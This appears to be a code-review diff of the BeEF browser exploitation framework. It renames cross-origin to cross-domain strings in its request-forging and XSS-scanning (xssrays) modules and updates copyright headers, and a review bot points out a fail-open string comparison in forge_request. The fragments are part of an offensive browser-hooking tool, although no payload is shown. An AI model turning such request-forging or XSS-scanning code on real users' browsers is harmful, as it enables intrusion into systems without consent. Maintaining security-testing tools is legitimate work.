response.port_status = "crossorigin";
response.port_status = "crossdomain";
if (xhr.status != 0) {
response.status_code = xhr.status;
@@ -446,7 +446,7 @@ beef.net = {
if (textStatus) {
response.status_text = textStatus;
} else {
response.status_text = "crossorigin";
response.status_text = "crossdomain";
}
if (xhr.getAllResponseHeaders()) {
@@ -460,7 +460,7 @@ beef.net = {
}
} else {
// same-origin request
// same-domain request
response.status_code = xhr.status;
response.status_text = textStatus;
response.headers = xhr.getAllResponseHeaders();
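Review bot: The guard in forge_request tests `allowCrossDomain == "false"`, which matches only the string form, while the usage example in the doc comment above it appears to pass a boolean `false` in that position; `false == "false"` is not true in JavaScript, so a caller following the example would not have the request blocked. Normalising the value keeps the restriction from failing open: `if (String(allowCrossDomain) === "false" && cross_domain) {`. Separately, forge_request derives the flag from scheme, host and port, so "origin" describes it more accurately than "domain". If the `cross_domain` naming stays, the `was_cross_domain` property and the `"crossdomain"` status strings need matching updates wherever responses are consumed, which is not visible on this page. The bodies of `request` and `forge_request` continue outside these hunks.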


@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//


@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//


@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//


@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//


@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -25,7 +25,7 @@ beef.net.requester = {
request = requests_array[i];
if (request.proto == 'https') var scheme = 'https'; else var scheme = 'http';
beef.debug('[Requester] ' + request.method + ' ' + scheme + '://' + request.host + ':' + request.port + request.uri + ' - Data: ' + request.data);
beef.net.forge_request(scheme, request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossOrigin, request.id,
beef.net.forge_request(scheme, request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossDomain, request.id,
function(res, requestid) { beef.net.send('/requester', requestid, {
response_data: res.response_body,
response_status_code: res.status_code,


@@ -171,7 +171,7 @@ beef.net.xssrays = {
this.xss({href:url.href, pathname:url.pathname, hostname:url.hostname, port: url.port, protocol: location.protocol,
search:url.search, type: 'url'});//scan each link & param
} else {
beef.debug('Scan is not Cross-origin. URLS\nurl :' + url.hostname.toString());
beef.debug('Scan is not Cross-domain. URLS\nurl :' + url.hostname.toString());
beef.debug('\nlocation :' + location.hostname.toString());
}
}
@@ -251,7 +251,7 @@ beef.net.xssrays = {
continue;
}
if (!this.crossDomain && (this.host(action).toString() != this.host(location.toString()))) {
beef.debug('Scan is not Cross-origin. FormPost\naction :' + this.host(action).toString());
beef.debug('Scan is not Cross-domain. FormPost\naction :' + this.host(action).toString());
beef.debug('location :' + this.host(location));
continue;
}


@@ -1,6 +1,6 @@
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
